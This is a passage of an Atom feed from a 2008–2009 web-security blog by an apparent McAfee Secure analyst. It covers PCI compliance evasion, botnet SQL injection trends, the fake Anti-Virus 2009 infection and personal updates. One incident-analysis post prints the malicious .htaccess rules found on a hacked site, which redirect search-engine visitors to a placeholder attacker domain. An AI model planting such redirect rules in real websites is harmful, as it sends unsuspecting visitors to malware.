This includes removing devices that are not PCI compliant from their account in order to print a compliant report for the ones that are, without properly identifying the scope of network segmentation. Another common issue that I see is customers providing inaccurate or false statements to verify that a vulnerability has been resolved by patching or mitigation. More often than not, I see the customer remove the page in question in order to become PCI compliant, just so that they can print a compliant report.&lt;br /&gt;Now, we do have checks that try to prevent this, but they are all based on the customer's word. I am just taking a guess here, but if they are going as far as removing devices, pages, or applications temporarily, then they are most likely going to tick a couple of check boxes without even thinking twice about it.&lt;br /&gt;&lt;br /&gt;Now, what I am about to say is purely my own opinion, but I am sorry, I just don't see it occurring any other way.&lt;br /&gt;Companies like Visa/Mastercard really need to force PCI compliance. The only way I see this ever being successful is if your shopping cart/payment application must be Visa/Mastercard approved.&lt;br /&gt;What do I mean by that? I mean that if you have a shopping cart or payment application, it must go through a Level 1 PCI audit with code review and be a Visa/Mastercard approved application.&lt;br /&gt;Why do I believe this? Well, if you are a mom and pop shop, you should not be allowed to have your own custom shopping cart. You are not programming this application with security in mind, and most likely it will not be secure. 
There are so many Visa approved shopping carts out there that you should be able to find one that accommodates your needs.&lt;br /&gt;If you are a "big time" enterprise company, then you should have the necessary components to program a secure application, and you should have the funding to get the necessary Level 1 PCI audit with code review and have it approved by Visa/Mastercard.&lt;br /&gt;&lt;br /&gt;Now, I know that by saying this, a lot of security professionals are going to think that this would totally put someone like me out of business. I do not think so. Just because the payment application is secure does not eliminate the threat. There are still other web application/network vulnerabilities out there. There is still a need to pen test websites. There is still a need for PCI compliance.&lt;br /&gt;&lt;br /&gt;Either way you look at it, something needs to change with the process by which we take/store credit card information. If PCI is not going to be the leader in attempting to address this, then who is?</content><link rel='replies' type='application/atom+xml' href='http://blog.igothacked.com/feeds/9139772783548772321/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1732826304675968996&amp;postID=9139772783548772321' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1732826304675968996/posts/default/9139772783548772321'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1732826304675968996/posts/default/9139772783548772321'/><link rel='alternate' type='text/html' href='http://blog.igothacked.com/2009/04/who-takes-pci-seriously.html' title='Who takes PCI 
seriously?'/><author><name>Declare.James</name><uri>http://www.blogger.com/profile/16886202561866981555</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_GV9ejoAirVk/Shbr87IaTtI/AAAAAAAAABg/guMdvwSA_dg/S220/l_f444508b7daf449585a3931f4b1cbb0f.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1732826304675968996.post-991507541224083253</id><published>2009-03-26T14:22:00.000-07:00</published><updated>2009-09-16T15:31:34.132-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='James Lester'/><title type='text'>All Quiet on the Home Front.</title><content type='html'>I just thought that I should update my blog to say that I don't really have anything to say.&lt;br /&gt;I have been taking some personal time off work and have really been off the front lines for the last month.&lt;br /&gt;One of the things that I have been up to is trying to get involved in more security-related discussions. It is sometimes difficult for me to participate in discussions of security because I am actually located away from the heart of it all. For someone like myself, who refuses to incorporate computers into his personal life and does not use one at home, I have been trying to physically include myself. This involves going to OWASP chapter meetings, staying late after work to study, etc.&lt;br /&gt;&lt;br /&gt;After March is over, I should be back to the same things. Until then, getting my garden ready for summer and saltwater fishing are my top priorities. 
I am also putting on a giant pumpkin growing contest, and last night I was able to contact the California state record holder and went over to his house for an awesome discussion; he even gave me seeds to use from a pumpkin that was over 1200 pounds.</content><link rel='replies' type='application/atom+xml' href='http://blog.igothacked.com/feeds/991507541224083253/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1732826304675968996&amp;postID=991507541224083253' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1732826304675968996/posts/default/991507541224083253'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1732826304675968996/posts/default/991507541224083253'/><link rel='alternate' type='text/html' href='http://blog.igothacked.com/2009/03/all-quiet-on-home-front.html' title='All Quiet on the Home Front.'/><author><name>Declare.James</name><uri>http://www.blogger.com/profile/16886202561866981555</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_GV9ejoAirVk/Shbr87IaTtI/AAAAAAAAABg/guMdvwSA_dg/S220/l_f444508b7daf449585a3931f4b1cbb0f.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1732826304675968996.post-8724400742277631637</id><published>2009-02-03T11:27:00.000-08:00</published><updated>2009-04-07T10:11:58.423-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='PCI Compliance'/><category scheme='http://www.blogger.com/atom/ns#' term='What is Wrong with PCI'/><category scheme='http://www.blogger.com/atom/ns#' term='Visa Compliance'/><title 
type='text'>Some things just don't rest as easy as others.</title><content type='html'>I had a phone conversation this week that is still somewhat bothering me. This once again has to do with PCI.&lt;br /&gt;Earlier this week I had a phone conversation with a gentleman who is affiliated with a major credit card company. This gentleman requested that a particular IP address be deleted from his company profile because the device contained a vulnerability that currently affected PCI compliance. He was asking me to delete the device because he would like to print out a compliant PCI report, and this vulnerability was preventing him from accomplishing this task. My entire conversation consisted of me trying to make the customer understand that he needs to be very careful in determining the scope of devices for his PCI compliance. The customer's response to this was that he will need to consult with his IT department and that he is only the Chief Security Adviser for the company.&lt;br /&gt;Now, I know that it doesn't take an elite security professional to recognize that something is quite odd about this, and that if anyone should be following PCI to a T, it should be the major credit card companies (or an affiliate) themselves.&lt;br /&gt;After I tried to provide as much information as possible, the issue quickly became that they do not have enough resources to mitigate the issue and would just like to remove the device from their profile and address it at a later time. I then proceeded to inform the customer that we do ask them to verify that all devices contained within the scope of PCI compliance have been added to be scanned, and that we then ask them to verify that the user is not swaying the vulnerability information in any way whatsoever.&lt;br /&gt;&lt;br /&gt;This phone call ultimately ended up with me pointing the customer to details on how to remove the device. 
As a final point of consultation I tried to have the customer read the PCI 1.2 documentation to determine the scope of all devices, and I was informed that he knew the documentation front to back and that it was not a concern.&lt;br /&gt;&lt;br /&gt;I would love to describe the moral of the story to everyone, but I think this is a no-brainer, so I will leave it at that.</content><link rel='replies' type='application/atom+xml' href='http://blog.igothacked.com/feeds/8724400742277631637/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1732826304675968996&amp;postID=8724400742277631637' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1732826304675968996/posts/default/8724400742277631637'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1732826304675968996/posts/default/8724400742277631637'/><link rel='alternate' type='text/html' href='http://blog.igothacked.com/2009/02/somethings-just-dont-rest-as-easy-as.html' title='Some things just don't rest as easy as others.'/><author><name>Declare.James</name><uri>http://www.blogger.com/profile/16886202561866981555</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_GV9ejoAirVk/Shbr87IaTtI/AAAAAAAAABg/guMdvwSA_dg/S220/l_f444508b7daf449585a3931f4b1cbb0f.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1732826304675968996.post-2424827336425625681</id><published>2009-01-15T08:14:00.000-08:00</published><updated>2009-04-07T10:15:32.560-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='McAfee Secure'/><category 
scheme='http://www.blogger.com/atom/ns#' term='McAfee Secure Standard'/><title type='text'>Is the Fishing Better on the Other Side of the River?</title><content type='html'>Recently I was the subject of another security professional's blog. My name was never mentioned in the blog itself, because I have never been publicly identified, but the entire subject matter of the blog was my current task here at McAfee. Now, I would believe that the majority of security professionals out there would not want their work to be criticized, but I actually feel the opposite. With all of the talk about the McAfee Secure Standard and how it could be improved, as a security professional myself, I fully agree. I do believe that client-side vulnerabilities such as Cross Site Scripting (XSS) and Cross Site Request Forgery (CSRF) should be a downgradable issue; however, business decisions are rarely up to the security professionals themselves.&lt;br /&gt;&lt;br /&gt;Now, I was planning on identifying the pros/cons of being under the current scrutiny of security professionals, but honestly, I could not find any cons about it. Not only did the blog serve as a small acknowledgment that what I am doing here is actually making a difference, but it also served as a tool that I could exploit to verify that this current issue was serious and needs to be addressed.&lt;br /&gt;&lt;br /&gt;I won't go into details of how I used this blog post to my advantage, but I will tell you that it involved sending the link to multiple parties. This raised the severity of the issue to a more critical state, and teams were assigned immediately to resolve the issue. It is amazing how someone you have never spoken with or met can make such an impact on your current position by pointing out the obvious. 
I guess sometimes the obvious is rarely understood until an example is made of it.&lt;br /&gt;&lt;br /&gt;I would like to finish typing for a while (because I am lazy today) by asking if anyone out there would like to blog about our salaries or the impact that we actually have on a company. I feel that these are two topics that affect me directly, and I would love for them to be open to scrutiny.</content><link rel='replies' type='application/atom+xml' href='http://blog.igothacked.com/feeds/2424827336425625681/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1732826304675968996&amp;postID=2424827336425625681' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1732826304675968996/posts/default/2424827336425625681'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1732826304675968996/posts/default/2424827336425625681'/><link rel='alternate' type='text/html' href='http://blog.igothacked.com/2009/01/is-fishing-better-on-other-side-of.html' title='Is the Fishing Better on the Other Side of the River?'/><author><name>Declare.James</name><uri>http://www.blogger.com/profile/16886202561866981555</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_GV9ejoAirVk/Shbr87IaTtI/AAAAAAAAABg/guMdvwSA_dg/S220/l_f444508b7daf449585a3931f4b1cbb0f.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1732826304675968996.post-6909693702100408051</id><published>2009-01-02T09:59:00.001-08:00</published><updated>2009-04-07T10:16:37.253-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' 
term='Anti-Virus 2009'/><category scheme='http://www.blogger.com/atom/ns#' term='.htaccess hack'/><category scheme='http://www.blogger.com/atom/ns#' term='Google redirect hack'/><category scheme='http://www.blogger.com/atom/ns#' term='302 Redirect Exploit'/><title type='text'>Update On Google 302 Redirect Exploit</title><content type='html'>So I received an email from a compromised customer that has his web host's explanation of how he received the Google 302 redirect exploit. I found it quite interesting, and I am currently working to see if it is in fact valid. I am having a few doubts (but it could easily be true) that this is exactly how this is occurring. Below is the response:&lt;br /&gt;&lt;br /&gt;&lt;p&gt;"In our ongoing commitment to the security of our customers, we have discovered a vulnerability located within many of our clients' websites, including yours. This is a self-replicating virus which is found by visiting well-known search engines. When you click on any link it may redirect you to a fake Anti-Virus 2009 website which appears to scan your system and then asks you to download the software. Once downloaded and installed it begins displaying pop-ups on your desktop. At this time it collects your FTP user name and password from your own computer and uses that information to upload an exploited file named ".htaccess" to your website. Any visitors to your website will then be redirected to the fake anti-virus website.&lt;/p&gt;&lt;p&gt;We have dedicated our systems administration team to finding a solution to this and are happy to say that, as one of the first hosting companies, we successfully cleaned all instances of this virus from our servers more than a week ago, and are continually scanning them to ensure your site does not become re-infected.&lt;/p&gt;&lt;p&gt;While your website is now secure, your computer may still be at risk. Here are two easy steps that will detect and remove this malicious software from your computer and make sure your website will not spread the virus again:&lt;/p&gt;&lt;p&gt;1. Uninstall the fake Anti-Virus software by following the instructions at this link:&lt;/p&gt;&lt;p&gt;http://www.bleepingcomputer.com/malware-removal/uninstall-antivirus-2009&lt;/p&gt;&lt;p&gt;2. Once removed, change your FTP password from within your web hosting control panel. Once logged in, click on the FTP Manager icon and then on the icon next to the password to change it.&lt;/p&gt;&lt;p&gt;To illustrate the severity of the issue I would like to share some facts with you:&lt;/p&gt;&lt;p&gt;* 26,991 of our customers have been infected with fake Anti-Virus 2009&lt;/p&gt;&lt;p&gt;* 79,469 websites have been spreading the Anti-Virus 2009 infection&lt;/p&gt;&lt;p&gt;* 120,923 malicious files have been removed from our system&lt;/p&gt;&lt;p&gt;We are constantly monitoring our servers for potential threats to your website, and are proud to say that we are among the first web hosts to identify this particular problem, and have been the first to offer a resolution. Your continued and safe presence on the internet is our top priority.&lt;/p&gt;&lt;p&gt;If you have questions regarding any of this information, please contact our support team anytime."&lt;/p&gt;</content><link rel='replies' type='application/atom+xml' href='http://blog.igothacked.com/feeds/6909693702100408051/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1732826304675968996&amp;postID=6909693702100408051' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1732826304675968996/posts/default/6909693702100408051'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1732826304675968996/posts/default/6909693702100408051'/><link rel='alternate' type='text/html' href='http://blog.igothacked.com/2009/01/update-on-google-302-redirect-exploit.html' title='Update On Google 302 Redirect Exploit'/><author><name>Declare.James</name><uri>http://www.blogger.com/profile/16886202561866981555</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_GV9ejoAirVk/Shbr87IaTtI/AAAAAAAAABg/guMdvwSA_dg/S220/l_f444508b7daf449585a3931f4b1cbb0f.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1732826304675968996.post-6785397639227243947</id><published>2008-12-22T09:18:00.000-08:00</published><updated>2009-04-07T10:17:37.799-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='McAfee Secure'/><category scheme='http://www.blogger.com/atom/ns#' term='Automated 
SQL Injection'/><category scheme='http://www.blogger.com/atom/ns#' term='Botnets'/><title type='text'>Quick Post On IE exploit and Botnets</title><content type='html'>So we have seen it posted to our favorite RSS feeds: botnets are launching automated SQL injection attacks attempting to exploit the new IE XML issue (&lt;a href="http://www.microsoft.com/technet/security/bulletin/ms08-078.mspx"&gt;Microsoft TechNet article&lt;/a&gt;). This issue has been beaten to death within blogs, but I just wanted to make a quick observation.&lt;br /&gt;&lt;br /&gt;Are botnets lying low until a severe 0day exploit hits the public, or do they just go into overdrive? With all of the talk about the economy, we are led to assume that when the economy has trouble, the hackers come out, but lately I have seen a decrease in automated SQL injection attacks. I have seen this decrease both within McAfee and by viewing items such as Google Safe Browsing lists.&lt;br /&gt;Will this continue to decrease? What will provoke it again? How will it evolve? How big of an impact will the economy have? 
Can we use history as a guideline?</content><link rel='replies' type='application/atom+xml' href='http://blog.igothacked.com/feeds/6785397639227243947/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1732826304675968996&amp;postID=6785397639227243947' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1732826304675968996/posts/default/6785397639227243947'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1732826304675968996/posts/default/6785397639227243947'/><link rel='alternate' type='text/html' href='http://blog.igothacked.com/2008/12/quick-post-on-ie-exploit-and-botnets.html' title='Quick Post On IE exploit and Botnets'/><author><name>Declare.James</name><uri>http://www.blogger.com/profile/16886202561866981555</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_GV9ejoAirVk/Shbr87IaTtI/AAAAAAAAABg/guMdvwSA_dg/S220/l_f444508b7daf449585a3931f4b1cbb0f.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1732826304675968996.post-4481421607263805632</id><published>2008-11-10T10:57:00.000-08:00</published><updated>2009-04-07T10:19:02.299-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='SQL Injection'/><category scheme='http://www.blogger.com/atom/ns#' term='Botnet'/><title type='text'>Where Have all the Bad Guys Gone???</title><content type='html'>So I am finally fed up with it.  Where have all the bad guys gone?
I would like to reach out to all of you and let you know that I am starting to run out of side projects.&lt;br /&gt;&lt;br /&gt;Since the beginning of 2008 I have seen a huge increase in automated blind SQL injection attacks on websites.  I was watching all of these attacks evolve (more on this to come later) into more and more crafty SQL statements attempting to inject a malicious .js file into the SQL database.  From what I have been reading, researchers have all agreed that botnets have been increasing almost exponentially over the last few months and are a huge contributor to these SQL injection attacks.  Not only was a large part of my day taken up by testing and consulting on all previous compromises, but also by researching and evolving my pen testing skills so that I could handle the growing workload from this increase in attacks.&lt;br /&gt;&lt;br /&gt;Then August came.  All of a sudden these attacks have almost come to a halt.  My workload from automated compromises has decreased by at least 75% with no apparent warning.
From a security conference I attended in September, I was informed that a few of the world's largest botnets have suspended operations to overhaul their entire structure, making them more efficient and more powerful.  This has been a direct cause of the decrease in automated SQL injection attacks, which will resume when activity picks back up within the botnets.&lt;br /&gt;&lt;br /&gt;It has been a couple of months now since I have seen the decrease in successful automated SQL injection attacks.  If you had asked me, I surely would have guessed that things would be "better than ever" in the botnet community by now, but I have not seen it in the end result.&lt;br /&gt;&lt;br /&gt;I am waiting patiently for things to be back up to normal and, like always, would love any ideas/news/opinions on when this is going to happen.</content><link rel='replies' type='application/atom+xml' href='http://blog.igothacked.com/feeds/4481421607263805632/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1732826304675968996&amp;postID=4481421607263805632' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1732826304675968996/posts/default/4481421607263805632'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1732826304675968996/posts/default/4481421607263805632'/><link rel='alternate' type='text/html' href='http://blog.igothacked.com/2008/11/where-have-all-bad-guys-gone.html' title='Where Have all the Bad Guys Gone???'/><author><name>Declare.James</name><uri>http://www.blogger.com/profile/16886202561866981555</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_GV9ejoAirVk/Shbr87IaTtI/AAAAAAAAABg/guMdvwSA_dg/S220/l_f444508b7daf449585a3931f4b1cbb0f.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1732826304675968996.post-8440273092296936119</id><published>2008-11-07T08:02:00.000-08:00</published><updated>2009-04-07T10:21:34.212-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Google redirect hack'/><category scheme='http://www.blogger.com/atom/ns#' term='302 Redirect Exploit'/><title type='text'>Search Engine 302 Redirect in .htaccess file.</title><content type='html'>A couple of months ago I was working with a customer whose website, whenever you attempted to reach it via Google or Yahoo, redirected you to the infamous Antivirus XP 2008 software.  After playing around a bit in my proxy, I was able to determine that this was a "Referer"-specific problem.  If you traveled to the website via the address bar, you were fine; however, if your Referer header was set to a major search engine domain such as google, aol, ask, or yahoo, you were automatically redirected to a malicious page.&lt;br /&gt;&lt;br /&gt;After alerting the customer of this issue, I asked him if he could please keep me informed of what was causing this.
I contacted him two days later only to hear that his hosting company had taken care of the issue and he had zero details for me regarding the compromise.&lt;br /&gt;&lt;br /&gt;For some reason, I really liked this type of compromise.  For the most part the website owner could be completely unaware that this has been occurring for months.  This, to me, is a compromise that does not take full advantage of the site, but instead leeches off of it like a tapeworm.&lt;br /&gt;&lt;br /&gt;I wanted to see this issue again.  So what I did was plug this into our product to attempt to detect any site that was currently redirecting only if the referrer was a site like Google or Yahoo.  A month went by before I was able to see this again.&lt;br /&gt;&lt;br /&gt;I was able to pick up on another search engine 302 redirect issue on the day that it was exploited.  Our product detected it and I verified that it was valid.  I was able to contact the customer and provide him with details about the issue, and he was willing to work with me on determining how this was occurring.&lt;br /&gt;&lt;br /&gt;Although I did not believe that this was occurring via SQL injection or via any GET/POST request, I still requested the entire week of log files.
In reviewing these log files, I did see a couple of RFI attempts, but nothing that looked successful, and from review of the .txt page that the RFI was calling, I did not see anything that would lead to a compromise.&lt;br /&gt;&lt;br /&gt;I was able to track down the problem and saw that the .htaccess file had been replaced and contained the following.&lt;br /&gt;&lt;br /&gt;RewriteEngine On&lt;br /&gt;RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]&lt;br /&gt;RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR]&lt;br /&gt;RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR]&lt;br /&gt;RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR]&lt;br /&gt;RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR]&lt;br /&gt;RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC]&lt;br /&gt;RewriteRule .* http://maliciousdomain.com [R,L]&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;So with the review of the website, I am starting to point myself in the direction that there is an issue with the file permissions on the webserver.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;This site was hosted through a large hosting provider with which I have already had previous issues.&lt;br /&gt;&lt;br /&gt;I had a compromised account come to me with an IFrame embedded on their website and all of the images deleted from the webserver.  When looking up the iframe on Google, I saw 20 different domains with the same iframe, all hosted by the same hosting provider.  We came to the conclusion that there were probably some serious permission issues on the webserver.  I had the customer move to a different hosting environment and they have not experienced a compromise since.  I am guessing that this site might be experiencing the same type of problem.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;If you have any more information on this issue, I would love to know about it.
I really enjoy working with these types of compromises because they are few and far between and, to me, seem well thought out in design.</content><link rel='replies' type='application/atom+xml' href='http://blog.igothacked.com/feeds/8440273092296936119/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1732826304675968996&amp;postID=8440273092296936119' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1732826304675968996/posts/default/8440273092296936119'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1732826304675968996/posts/default/8440273092296936119'/><link rel='alternate' type='text/html' href='http://blog.igothacked.com/2008/11/search-engine-302-redirect-in-htaccess.html' title='Search Engine 302 Redirect in .htaccess file.'/><author><name>Declare.James</name><uri>http://www.blogger.com/profile/16886202561866981555</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_GV9ejoAirVk/Shbr87IaTtI/AAAAAAAAABg/guMdvwSA_dg/S220/l_f444508b7daf449585a3931f4b1cbb0f.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-1732826304675968996.post-5742967582047320608</id><published>2008-11-06T14:31:00.000-08:00</published><updated>2009-09-16T15:30:52.132-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='James Lester'/><title type='text'>An Introduction</title><content type='html'>So I have decided to start working on SEO for my life.
I know this sounds a little dumb, but everyone is doing it, and well, I need to capitalize on it also.&lt;br /&gt;&lt;br /&gt;My name is James A Lester and I am a Security Analyst for McAfee's McAfee Secure product.&lt;br /&gt;My current position at McAfee is Senior Level Analyst.  The majority of my position is to review compromised websites, determining how the compromise occurred and verifying that the website is further secured from the compromise occurring in the future.&lt;br /&gt;&lt;br /&gt;I really enjoy my position as I feel that I am on the front lines of web application security.  I feel that I am viewing 0day information in SQL injection, CSRF, XSS, RFI/LFI, etc.&lt;br /&gt;&lt;br /&gt;What I am hoping to get out of this blog is to post any information that I am currently seeing coming down the pipe in the security world, and see if anyone else has anything to provide in the discussion.&lt;br /&gt;&lt;br /&gt;I will try to remember to update this blog (keyword try, I don't think I have updated my resume since high school except for adding jobs) with anything that I am working on in the world of security or anything that I feel like.</content><link rel='replies' type='application/atom+xml' href='http://blog.igothacked.com/feeds/5742967582047320608/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=1732826304675968996&amp;postID=5742967582047320608' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/1732826304675968996/posts/default/5742967582047320608'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/1732826304675968996/posts/default/5742967582047320608'/><link rel='alternate' type='text/html' href='http://blog.igothacked.com/2008/11/introduction.html' title='An Introduction'/><author><name>Declare.James</name><uri>http://www.blogger.com/profile/16886202561866981555</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='24' src='http://2.bp.blogspot.com/_GV9ejoAirVk/Shbr87IaTtI/AAAAAAAAABg/guMdvwSA_dg/S220/l_f444508b7daf449585a3931f4b1cbb0f.jpg'/></author><thr:total>0</thr:total></entry></feed>
